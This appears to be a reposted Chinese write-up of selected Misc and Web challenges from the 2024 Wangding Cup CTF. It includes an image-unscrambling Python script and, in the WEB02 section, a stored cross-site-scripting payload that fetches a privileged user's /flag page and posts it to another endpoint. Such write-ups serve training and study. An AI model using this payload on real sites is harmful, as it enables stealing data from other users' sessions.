当前位置: 首页 > news >正文

2024网鼎杯青龙组Web+Misc部分WP

MISC01

发现人员的定位信息存在泄露,请对其进行分析。flag为用户位置信息进行32位md5哈希值

我们在这里可以找到关于Location——information信息

尝试把val值继续32位md5哈希加密,拿到flag

flag{4c4e66ea9aa659b1cac5d4fe327bbfc1}

MISC03

第 1 步:看到好几个上传木马的 ip,都试一试,最终 ip 为 39.168.5.60 的为

正确攻击 ip

MISC04

推测应该是按着曲线的轨迹将像素还原到原来的位置

脚本如下:

from PIL import Image
from tqdm import tqdmdef peano(n):if n == 0:return [[0,0]]else:in_lst = peano(n - 1)lst = in_lst.copy()px,py = lst[-1]lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + 1 + i[0], py - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px - i[0], py - 1 - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py - 1 - i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + 1 + i[0], py + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px - i[0], py + 1 + i[1]] for i in in_lst)px,py = lst[-1]lst.extend([px + i[0], py + 1 + i[1]] for i in in_lst)return lstorder = peano(6)img = Image.open(r"C:\Users\ASUSROG\Desktop\chal.png")width, height = img.sizeblock_width = width # // 3
block_height = height # // 3new_image = Image.new("RGB", (width, height))for i, (x, y) in tqdm(enumerate(order)):# 根据列表顺序获取新的坐标new_x, new_y = i % width, i // width# 获取原图像素pixel = img.getpixel((x, height - 1 - y))# 在新图像中放置像素new_image.putpixel((new_x, new_y), pixel)new_image.save("rearranged_image.jpg") 

拿到二维码,扫描拿到flag

参考:IrisCTF2024 | 1r0ny

WEB02(环境关了没图片呜呜呜)

第 1 步:打开网页,目录扫描扫描到/flag,尝试访问,提示只有 boos 可以访

问。

第 2 步:尝试登录,admin/1,登录成功。

第 3 步:

<script>fetch('/flag').then(response=>response.text()).then(data=>{fetch('/content/a9571d0
e889a28847d8682903',{method:'POST',headers:{'Content-Type':'application/x-www-form- 
urlencoded'},body:"content="+data});})</script>

更新之后提交给 boos,刷新页面拿到 flag


http://www.mrgr.cn/news/61770.html

相关文章:

  • 【React】React 的核心设计思想
  • 【计算机网络教程】课程 章节测试1 计算机网络概述
  • GCC及GDB的使用
  • Xmind思维导图百度云资源下载与安装(附教程)
  • linux 驱动, struct file , struct node, private_data
  • 2024年9月电子学会青少年软件编程Python等级考试(三级)真题试卷
  • 群控系统服务端开发模式-应用开发-业务架构逻辑开发Base开发总结
  • 【测试】——接口测试入门
  • 双十一狂欢节有哪些数码好物值得入手,盘点五款入手不亏的好物!
  • 从0开始搭建一个生产级SpringBoot2.0.X项目(二)SpringBoot应用连接数据库集成mybatis-plus
  • 计算结构力学:多自由度振动系统
  • 研究线性模型训练中损失变化的规律和最优学习率的影响
  • 2024 Rust现代实用教程:1.3获取rust的库国内源以及windows下的操作
  • Infinity-MM数据集:一个包含 4000 万个样本的开源视觉语言模型的大规模多模态指令数据集。
  • 【征程 6 工具链性能分析与优化-1】编译器预估 perf 解读与性能分析
  • 矩阵压缩格式转换:COO转换CSC(C++)
  • Python世界:自动化办公Word之批量替换文本生成副本
  • nginx[新手用][模块化][高效]配置
  • 使用命令行上传 ipa 到 App Store(iTMSTransporter 3.3)
  • [JAVAEE] 面试题(二) - CAS 和 原子类
  • 计算机组成原理之高级语言程序与机器级代码之间的对应、高级语言和机器级代码的具体示例
  • 优化云成本,打造卓越体验,他们有话说
  • 微信小程序 - 获取汉字拼音首字母(汉字英文首字母)根据汉字查拼音,实现汉字拼音首字母获取,在小程序上实现汉字的拼音提取首字母!
  • [专有网络VPC]管理VPC配额
  • 智慧园区 | 数智引领,让智慧触手可及
  • String的长度有限,而我对你的思念却无限延伸